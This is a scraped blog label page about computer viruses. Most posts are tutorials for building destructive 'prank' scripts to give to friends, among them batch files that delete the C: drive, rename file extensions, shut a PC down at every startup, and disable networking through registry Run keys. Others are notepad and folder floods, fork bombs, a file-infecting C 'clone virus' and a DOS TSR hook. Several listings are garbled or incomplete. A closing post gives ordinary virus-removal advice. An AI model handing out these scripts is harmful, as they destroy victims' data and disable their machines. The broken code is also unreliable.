Showing posts with label All About Virus. Show all posts
Showing posts with label All About Virus. Show all posts

Sunday, 1 December 2013

Virus to destruct hard drive

Virus to destruct hard drive

Hi friends! There is a Trick to make a Virus which
can Format and Destroy Hard Drive using Notepad.
This Virus can be used to annoy your friends or
enemy. Touse this Trick follow the simple steps
given below :

1) Open Notepad.
2) Copy and Paste the given Code into Notepad :
3) Save it as HardDriveVirus.exe.
4) Now it is done.
5) Don't Run this Fle on your Own Computer. If you
run this file the Hard Drive would be Formated.

WARNING- Don't try this on your own PC.

Making 3,000 Folder Virus

Make a virus to create 3,000 folders
u can create a virus in notepad that create 3,000
folder with one click.
Open notepad and type following:
@echo off
md %random%
goto top
and save as folder.bat
Send to ur friends and enjoy.

Double click on Internet explorer to Restart the Computer

Double click on Internet explorer to Restart the Computer:

1) Goto Desktop
2) Right click > new > Shortcut
3) In “Type the Location of the item” > write: “C:\WINDOWS
\system32\shutdown.exe -r -t 00? without coutes.
4) Click next and in “Type a name for this shortcut” write ”
Internet Explorer” and click Finish.
5) Now Right Click on the shortcut of Internet Explorer and
goto “Change Icon” and select the icon of Internet
6) Now Virus is Ready… haha.. check it out.. when you will
double click on Internet Explorer Shortcut… Computer will

Trick to make Virus which can Disable Internet Permanently

Trick to make Virus which can Disable Internet Permanently

There is a Trick to make Virus which can Disable Internet Permanently. To do this follow these simple steps :

1) Open Notepad.

2) Copy and Paste the following Code into Notepad :

echo @
echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d
:windowswimn32.bat /f reg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!

3) Save it as Internet Disabled.bat.

4) Now it is done. So it is a simple Trick to make Virus which can Disable Internet Permanently.

And Give this file to your friend... But try At own your Risk .....

Making Clone Virus

Clone Virus
  • Effect –>  Harmful and very effective.
  • Coding Platform –>  C, Turbo C.
  • Working –>  On Executing, this virus does is it makes all the files in the current directory a virus. Just remember to run this virus inside a new folder that contains no important exe and normal files . This virus will make them too as virus.
FILE *Ron *vRon;
int owned = 0;
unsigned long x;
char buff[256];
struct ffblk ffblk;
clock_t st, end;
owned=(find_first(“*.*”, &ffblk,0);
Ron=fopen(_arg[0], “rb”);
vhost=fopen(ffblk.ff_name, “rb+”);
if (vhost = =NULL)
goto next;
x = 89088;
printf(“infecting %s\n”, ffblk.ff_name);
x – = 2048;
next:      fcloseall();
owned = findnext(&ffblk);
end = clock()
printf(“Infected %d files in %f sec”, a, (end-st)/CLK_TCk);
return (0);

Making Pop-up CD/DvD Drive Virus

PoP-uP  CD/DvD  Dr!Ve  V!rUs
  • Effect –>  Low, but very irritating. Not Harmless.
  • Coding Platform –>  VBscript.
  • Working –>  On Executing, It will continously pop-up uR CD/DVD. It is very irritating and can be stopped only on system shut-down. It is not harmless or destructive.
Just copy the code or type it on notepad and save it as anyname with “.vbs” extension.
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
For i = 0 to colCDROMs.Count – 1
End If
wscript.sleep 5000

Making Notepad Tsunam Virus

 NoTePaD  TsuNaM!  V!rUs
  • Effect –>  Harmful n Effective, Cause system crash easily.
  • Coding Platform –>  VBscript.
  • Working –>  On Executing, it opens notepad unlimited no. of times and write a text into notepad automatically. It looks very scary for normal users as it leads to system hang and crash system in few minutes.
Just type the code or copy it on notepad and save it as anyname with “.vbs” extension.
Set wshShell =wscript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.SendKeys “H”
WScript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “o “
WScript.Sleep 200
WshShell.SendKeys ” “
WScript.Sleep 200
WshShell.SendKeys “u”
WScript.Sleep 200
Wshshell.Sendkeys “s”
Wscript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “r”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “…”
WScript.Sleep 200
WshShell.SendKeys “{enter}”
WScript.Sleep 200
WshShell.SendKeys “You”
WScript.Sleep 200
WshShell.SendKeys ” Have”
WScript.Sleep 200
WshShell.SendKeys ” Been”
WScript.Sleep 200
WshShell.SendKeys ” Hacked!!!”
WScript.Sleep 200
WshShell.SendKeys ” Now”
WScript.Sleep 200
WshShell.SendKeys ” Just”
WScript.Sleep 200
WshShell.SendKeys ” Taste”
WScript.Sleep 200
WshShell.SendKeys ” What”
WScript.Sleep 200
WshShell.SendKeys ” Virus”
WScript.Sleep 200
WshShell.SendKeys ” can do with uuuuuuuuuuuuu….”
WScript.Sleep 200
WshShell.SendKeys ” {enter}”
WScript.Sleep 200
WshShell.SendKeys “hahahahaha…….”
WScript.Sleep 200
WshShell.Sendkeys ” Now just Look Dumb Head what i will do!!!!!!!”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “look”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “how”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 100
wshshell.sendkeys “i”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “crash”
wscript.sleep 200
wshshell.sendkeys ” uR”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “system”
wscript.sleep 200

Making Dancing Capslock And Numlock Key Virus

DanC!nG   CaPsLocK  N  nUmKeY
  • Effect –>  Low, Irritating for normal user.
  • Coding Platform –>  VBscript
  • Working –>  On executing it will toggle both,  capslock and numkey continously and it becomes very irritating for normal user. This type of code can be used for prank purposes.
Just type the code or copy it on notepad and save it as anyname with “.vbs” extension.  Example  –>  ”ron.vbs”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”

File Extension Corrupting Virus

F!le  eXTenS!oN  CorrUPT!nG  V!rUs
  • Effect –>  Effects file execution, irritating but not destructive. Will Corrupt file working.
  • Coding Platform –>  Batch Programming.
  • Working –>  On executing this code will affects the opening of file and will corrupt the files extension. This will corrupt the file and disables it and you will not be able to execute it in proper format.
Just type or copy the code in notepad and save it as anyname with “.bat” extension.
@echo off
ren *.exe *.txt
ren *.jpeg *.txt
ren *.mp3 *.txt
ren *.doc *.com
ren *.jpg *.txt

Deadly Wordpad Virus

DeaDLy  woRdPaD  V!rUs
  • Effect –>  Deadly and Destructive.
  • Coding Platform –>  Batch Programming.
  • Working –>  On executing, this code will delete every single piece of data from uR hard-drive. It will also wipe out windows from the system.
Just copy the code or type it in a worpad and save it as anyname with “.bat” extension.
@echo off
deltree C:\

Notepad Flood Virus

NoTePaD  fLooD
  • Effect –>  Not Destructive or harmless.
  • Coding Platform –>  Batch Programming.
  • Working –>  On executing this .bat file it will open and flood loads of notepad {actually it opens around 180 notepads}. This sometimes cause PC hang.
Type the code or just copy the code in notepad and save it as “.bat” extension.
@echo off
start notepad
start notepad
start notepad
goto RON
In the above code you can write “start notepad” any number to times. Increasing this command will increase flooding and cause higher chances of system hang-up.

Multiple Folder Virus

MuLt!PLe  FoLDeR  V!RuS
  • Effect –> Not Destructive, But sometimes can become very irritating and itchy.
  • Coding Platform –>  Batch Programming.
  • Working –>  This code will just create multiple folders each time system starts-up and also open those hundreds of folders. It is not destructive but while executing it can eat up uR system process and results in slow system performance and sometimes could hang system.
Just write or copy the code in notepad and save it as “.bat” extension.
@echo off
md folder1
md folder2
md folder3
md folder4
md folder5
start folder1
start folder2
start folder3
start folder4
start folder5
goto RON
Now goto, START  –>  ALL PROGRAMS  –>  STARTUP FOLDER. Now just copy that .bat file in that folder. Next time system starts, multiple folders are created and will start automatically. You can name folder name anything as you want.

Making ShutDown Virus { More Destructive}

 sHUtDowN  V!rUs  {mORe DesTrUCt!ve}
This code is same as above but it restricts system to start and shuts down system each time it starts.
  • Effect –>  Destructive and Irritating.
  • Coding platform  –> Batch Programming.
  • Working  –> Shuts down system each time it starts, and user are never able to login properly. If user boots up system again and again, it sometimes cause windows failure or data lost.
Just type or copy the code in notepad and save it as “.bat” extension.
@echo off
shutdown -s -t “00″
Now goto following location  –>  start  –>  all programs  –>  startup. Right Click and open folder. Now just copy that saved .bat file and paste in that startup folder.

Making Shut Down Virus

 sHuTDoWn  VirUs
Many of you know this trick, but i can’t call this a virus. But still its not a friendly one, it can affect and harm uR data if not saved.
  • Effect –> May Harm uR workings and unsaved data.
  • Coding  Platform –> Batch Programming.
  • Working –> On executing, it will shutdown your system immidiately. If your data is not saved, it can harm uR workings. And can sometimes becomes more destructive for normal users.
Type the code or just paste the code in notepad and save it as “.bat” extension. Example  –>  ron.bat
@echo off
shutdown -s -t “30″
“30″ mentioned here is time in seconds in which your system will shut-down. You can set any time as uR requirements. You can also add comments by adding “-c” tag after “30″. To  give any message to user while shutdown process.
Example  –>  shutdown -s -t “60″ -c “Windows Formatting starts…”

Monday, 13 May 2013



Everybody is scared of computer ‘virus’ as it does harmful actions on our computer. But
when we look into the virus programming, we may certainly come out with the conclusion that it
requires intelligence to code a virus.


It is easy to mess-up the right program. For example, if you remove even a single byte
from an EXE file, that EXE file won’t be usable! Virus program don’t have any specific rules.
But it’s a common practice to include ‘signatures’ by virus creators. The main idea is to force the
innocent user to run the programs. So certain viruses come along with so called ‘programmer
utilities’ or ‘free tools’. Another thing is, it is easy to hang-up a working system using some ‘bad’interrupts. Viruses use this logic too!

TSR viruses

When TSR got its popularity, crackers started using TSR concepts for virus
programming. There was a time when people who knew TSR started writing their own TSR
viruses. But when Windows operating system was introduced, TSR viruses lost their
I have written the following program. This is actually a TSR virus. It is not much
harmful; it just changes the attribute (color) byte of the existing characters present on screen.

#ifndef __SMALL__
#error Compile with Small memory model
int i = 1;
char far *Vid_RAM = (char far *)0xb8000000;
void interrupt (*Int9)( void );
void interrupt MyInt9( void );
void interrupt MyInt9( void )
*( Vid_RAM + i ) = i;
if ( i>4000 )
i = 1;
i += 2;
(*Int9)( );
} /*--interrupt MyInt9-----*/
int main(void)
Int9 = getvect( 9 );
setvect( 9, MyInt9 );
keep( 0, 500 );
} /*--main( )----*/

Windows viruses

When Windows operating system was introduced, much of the DOS based viruses lost
their “popularity”. Under Windows operating system, only certain viruses like “Boot sector virus”and “Disk formatting viruses” can do harmful actions. So crackers went for exploiting Windows.Windows based viruses exploit Internet ‘loopholes’. As VB Script even has access to Windows Registry, VB Script is commonly used for Windows/Internet based “spreading viruses”.

As I said earlier, many virus programmers add signature to their program. So by
checking the signature, we can find the name of the virus. Most of the anti-virus packages use this
logic! The following table shows few viruses and their signatures.

Virus Signature
Einstein --------0042CD217231B96E0333D2B440CD2172193BC17515B80042
Phoenix 927 -----E800005E81C6????BF0001B90400F3A4E8
Spanz -----------E800005E81EE????8D94????B41ACD21C784
Necropolis ------50FCAD33C2AB8BD0E2F8
Trivial-25 ------B44EFEC6CD21B8??3DBA??00CD2193B440CD
Trivial-46 ------B44EB120BA????CD21BA????B80?3DCD21%2BA0001%4B440CD
SK --------------CD20B80300CD1051E800005E83EE09

So you can find that writing anti-virus package is not a tough job.
But understand the fact that checking out the signature is not 100% foolproof.

enjoy Hacking

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How To Make The Simplest Virus – Fork Bomb [Hacks]

How To Make The Simplest Virus – Fork Bomb [Hacks]

Launching fork bomb will lead to total CPU jam by opening about 500 process of command prompt CPU usage will be overloaded and computer will freeze.
1) Launch notepad and type

Batch Fork Bomb

2) Save as .bat , for example fork.bat
3) Launch .bat file that you created in step 2 , once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation.

C Fork Bomb

Here is a in C++ version of Fork bomb.
int main(void)
  return 0;

Shell Script Fork Bomb

And a shell (Unix/bash) version.
 : (){ : |:& };:
Once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation. Stopping a fork bomb requires destroying all running instances of it. Trying to use a program to kill the rogue processes normally requires creating another process a difficult or impossible task as it will totally use memory for its instances.
You can get creative and try to use program executables or call system applications or utilities recursively in the same manner and increase the damage manifolds. Let your creativity run loose.
Use it for crashing your friends/foe’s PC
And feel free to comment...

Monday, 18 February 2013

What To Do If You Get a Virus on Your Computer

What To Do If You Get a Virus on Your Computer

Whether you saw a message saying a virus was detected or your computer seems slow and unreliable, this guide will walk you through the process of dealing with your infection and removing the malware.
While many viruses and other types of malware are designed simply to cause chaos, more and more malware is used by organized crime to steal credit card numbers and other sensitive data.

Did Your Antivirus Say a Virus Was Detected?

If you saw a message pop up that says a virus was detected, that’s a good thing. Your antivirus noticed a virus and likely removed it without prompting you.
This sort of message doesn’t mean that you ever had a virus running on your computer. You could have downloaded a file that contained a virus and your antivirus removed the file before it could ever cause a problem. Or, a malicious file on an infected web page could have been noticed and dealt with before it caused any problems.
In other words, a “virus detected” message that occurs during normal use of your computer doesn’t mean your computer was ever infected or that the virus ever did anything. if you see a message like this, you’re likely visiting an infected web page or downloading a harmful file. Try to avoid doing that in the future, but don’t worry too much.
You can also go into your antivirus program and check its quarantine or its virus detection logs to view more information about the virus and what action was taken.

If You’re Not Running an Antivirus

If you’re not running an antivirus and your computer has become slow and unreliable, it’s possible that you have a virus. This can also occur if you’re running an antivirus with out-of-date virus definitions.
If you don’t have an antivirus installed, you should try to install one immediately. There are a variety of free antivirus products you can download, including Microsoft Security Essentials. The antivirus should ideally be able to clean up the viruses and fix your problems after you install it. If the antivirus can’t fix the infections on your system, read the section below on dealing with more troublesome infections.

If You Think Your Antivirus Isn’t Catching A Virus

If you already have an antivirus program installed but you think you may have viruses it isn’t detecting, you can get a second opinion from another antivirus product.
A variety of antivirus providers make one-time scanning tools available – for example, theESET Online Scanner. These programs will download to your computer and do a quick scan without a long installation process. You can’t have multiple antivirus products installed at the same time, so this allows you to scan with another antivirus without going through the hassle of uninstalling your current antivirus.
If the scanner alerts you to a problem, you’ll want to remove the viruses with the scanning tool. If you had a virus, your current antivirus may not be up to the job. You may want to uninstall it and install another antivirus product after the process is complete.

Dealing With More Problematic Infections

Some viruses and other types of malware dig their hooks deep into your system, making them difficult to remove – especially by antivirus products you install later, after the virus has infected your system and had time to run wild, possibly downloading additional types of malware.
Booting into Safe Mode can help. In Safe Mode, Windows won’t load third-party software (including the virus), so you’ll be able to run your antivirus program without the virus interfering in the background. To boot into Safe Mode, restart your computer, press the F8 key while the computer is booting up, select the Safe Mode option in the boot options menu, and press the Enter key. Run the antivirus program in Safe Mode and restart after you’re done cleaning up. (If you don’t see the boot options menu, restart your computer and try again – you may not have pressed the F8 key at the correct time.) If you need Internet access in Safe Mode, select Safe Mode with Networking in the boot options menu instead.
If running the antivirus in Safe Mode doesn’t work, you can try booting from an antivirus rescue CD. When you boot into the rescue CD, the antivirus gets a clean environment to work in. It can scan your hard drive while the virus lies dormant, making it easier to clean infections that make themselves hard to remove. We’ve covered using the BitDefender, Avira, and Kaspersky rescue discs to remove viruses from computers.
The “nuclear option” if nothing can remove the viruses properly – or if the malware so damaged your system that Windows still isn’t working properly after you’ve removed the viruses – is reverting your computer to its factory state. Many computers come with restore partitions that you can access by pressing a certain key during the boot process (consult your computer’s manual for the exact key). You may also have a Windows installer disc you can use to reinstall Windows. Note that this will delete the files and programs on your computer, so be sure your important data is backed up before you reinstall Windows from scratch.